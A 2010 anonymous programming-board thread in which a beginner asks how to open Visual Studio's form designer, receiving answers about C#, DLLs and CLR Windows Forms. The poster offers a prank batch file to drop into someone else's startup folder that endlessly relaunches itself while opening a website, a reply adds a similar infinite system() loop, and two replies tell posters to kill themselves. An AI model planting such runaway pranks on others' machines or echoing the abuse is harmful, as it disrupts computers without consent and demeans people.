Return Styles: Pseud0ch, Terminal, Valhalla, NES, Geocities, Blue Moon.

Pages: 1-

visual studio win32 c++

Name: Anonymous 2010-09-24 19:49

I'm not use to gui's yet. 
In visual studio after I create a new win32 c++ project how do I find the screen with the applications user interface so I can add buttons and stuff.  I can only find the one for the about box (>_<)

In return I give you epic batch file

rem save this as run.bat put it in your moms start folder
start http://4chan.org/b/
run.bat

Name: Anonymous 2010-09-24 20:03

i dont know

Name: Anonymous 2010-09-24 21:15

bump because I need helps

Name: Anonymous 2010-09-24 21:44

You can't with C++. Switch to C#.

Name: Anonymous 2010-09-24 21:46

I don't know c# can I call c++ functions from an include file with c#?

Name: Anonymous 2010-09-24 21:47

also why cant I with c++

I can when I edit projects other people have started

Name: Anonymous 2010-09-24 22:10

>>5
no

Name: Anonymous 2010-09-24 22:38

I am doing code to interact with some hardware and need to be able to call functions that where written in c

I can do a command line program with out problems but i need this to be a gui

feels bad man, dad sends me to school for a year now expects me to wright software for his business

Name: Anonymous 2010-09-24 22:47

>>8
You can import C and C++ DLLs into C#.

Name: Anonymous 2010-09-25 0:33

Protip: use command line compiling and make the windows the proper way

Name: Anonymous 2010-09-25 0:35

but its the include that digests the dll talking for me i really dont want to re create that

Why is it so hard to make a simple win32 gui in c++

When i build and run the interface is there i just don't know how to modify it

Name: Anonymous 2010-09-25 3:46

Sounds Enterprise quality

Name: VIPPER 2010-09-25 3:58

>>3
Learn english first.
>>8
I am doing code to interact with some hardware and need to be able to call functions that where written in c
What the fuck is that supposed to mean?
>>11
Why is it so hard to make a simple win32 gui in c++
It aint.

Name: Anonymous 2010-09-25 6:00

>>13
██████████████████████████████

Name: Anonymous 2010-09-25 11:40

>>13
>What the fuck is that supposed to mean?
I have a header file that I include it makes it so I can use the dll that interacts with the hardware not that that really matters I just need to know how to open the gui designer so I can add a simple button and dialog

Name: Anonymous 2010-09-25 15:34

In return I give you epic batch file

rem save this as run.bat put it in your moms start folder
start http://4chan.org/b/
run.bat

Kill yourself.

Name: Anonymous 2010-09-25 16:12

>>16
That was uncalled for

>>1
Here is what you do
File > new >  project
press the + by visual C++ then highlight CLR
Select windows forms application
set file names and locations and press ok
It will bring up a 'what you see is what you get' design window. 
Have fun and gl!

Also
while(1){
system ("start http://4chan.org/b/");
}

Name: Anonymous 2010-09-26 2:17

>>17
Kill yourself.

Name: Anonymous 2010-09-26 9:35

[b]test[/b]

Don't change these.
Name: Email:
Entire Thread Thread List